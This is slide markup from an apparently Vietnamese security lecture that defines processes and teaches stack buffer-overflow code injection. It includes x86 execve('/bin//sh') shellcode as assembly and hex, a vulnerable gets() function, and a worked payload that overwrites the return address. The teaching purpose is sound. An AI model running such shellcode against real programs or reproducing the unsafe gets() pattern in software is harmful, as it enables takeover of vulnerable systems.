                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06ECEBCD-DBAF-4BB2-6810-22E28E3A2457}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3048000"/>
            <a:ext cx="2667000" cy="2568365"/>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15000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>xor %eax, %eax</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push %eax</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push $0x68732f2f</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push $0x6e69622f</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mov %esp, %ebx</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mov %eax, %ecx</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mov %eax, %edx</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mov $0xb, %al</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>int $0x80</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;815;p69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AC07F41-A753-0025-C821-3A2357B14647}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5490275" y="3419639"/>
            <a:ext cx="2514600" cy="1825085"/>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400" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>0x31 0xc0 0x50 0x68 0x2f 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x89 0xc1 0x89 0xc2 0xb0 0x0b 0xcd 0x80</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53CE527A-BC87-0753-66A4-FF1739ED4E05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3962400" y="4332182"/>
            <a:ext cx="1527875"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2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7F1C-F5F8-4B19-98F2-CF176FF3AEC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tiến trình(process) là gì?</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E0B8921-D1E8-449B-9F12-92A94A029238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tiến trình(process) ≠ chương trình(program)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Là ch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ơng trình đang đ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ợc thực hiện</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Các tài nguyên tối thiểu của tiến trình:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Vùng nhớ đ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ợc cấp phát</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Con trỏ lệnh(Program Counter)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Các thanh ghi của CPU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Khối điều khiển tiến trình(Process Control Block-PCB): Cấu trúc chứa thông tin của tiến trình</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{669DD6F2-EED0-426D-BDF6-5C6CF504819C}"/>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931490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D61B-1119-2C68-4167-B3AE72E146B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Code Injection – Ví dụ</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{913C2530-F4E4-9397-B9C6-8D7CC5A4BDA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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5" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0B2D919-FA5F-DCBD-230E-8762228EA3C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="600707907"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5753104" y="1236615"/>
          <a:ext cx="2714397" cy="45806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latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>SFP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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;784;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39CE6C4B-D13E-70B8-0FE0-E4A817D007C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="8158200" y="4869150"/>
            <a:ext cx="1228800" cy="4002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600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Google Shape;785;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A81C2E2F-C0F0-6E47-AC82-0352902DD064}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8772600" y="4302450"/>
            <a:ext cx="0" cy="483300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Google Shape;786;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E39D18C-8E4F-6DC5-B8EB-07F443E4EBAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8772600" y="5342850"/>
            <a:ext cx="0" cy="474125"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Google Shape;788;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B876F8BE-A72B-5937-B349-955936378E5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8572500" y="3626319"/>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RIP</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Google Shape;788;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{276DC999-BB73-B98C-7A1F-99DB64563CC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8572500" y="3916588"/>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SFP</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;782;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB3FC0F5-1E8E-4E89-0687-5397FDA51ACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="5032004"/>
            <a:ext cx="3668699" cy="1169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void vulnerable(void) {</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char name[20];</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gets(name);</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12" name="Google Shape;783;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E1F270B-0E66-60E1-07A6-203FE6A00451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513574" y="1143000"/>
            <a:ext cx="3753625" cy="677078"/>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lvl="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Giả</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> sử SHELLCODE có độ dài 12 byte, địa chỉ của </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> là </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>0xbfffcd40</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;789;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60AB6E40-49DB-C84E-8DEB-EC2B35399220}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513574" y="3472312"/>
            <a:ext cx="3753625" cy="677078"/>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600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ẻ tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> công đưa giá trị đầu vào nào cho hàm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gets</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Google Shape;790;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF5CBBAB-01C9-3453-6182-A424B1DE034C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487743" y="2307656"/>
            <a:ext cx="3753625"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SHELLCODE có thể ghi vào bộ nhớ từ địa chỉ nào? Kẻ tấn công muốn ghi đè giá trị nào lên RIP?</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="15" name="Google Shape;840;p71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFBE9060-42C2-39FF-1A13-51F54015CB5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4124778514"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4421307" y="3378895"/>
          <a:ext cx="1439950" cy="2438080"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2914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52550">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">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0xbfffcd5c</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0xbfffcd58</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0xbfffcd54</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0xbfffcd50</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0xbfffcd4c</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0xbfffcd48</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0xbfffcd44</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52550">
                <a:tc gridSpan="4">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0xbfffcd40</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>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450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D61B-1119-2C68-4167-B3AE72E146B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Code Injection – Ví dụ</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83ED9F66-FE48-3C7F-3356-5FAF68F09699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="4343400" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>Đầu vào: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SHELLCODE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'A' * 12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'\x40\xcd\xff\xbf'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="939800" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1400"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>12 bytes chứa shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="939800" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1400"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>12 byte lấp đầy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t> và SFP của </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="939800" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1400"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>Địa chỉ của shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>Có cách khác không?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>Nếu SHELLCODE có  kích thước lớn hơn 28 byte?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{913C2530-F4E4-9397-B9C6-8D7CC5A4BDA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
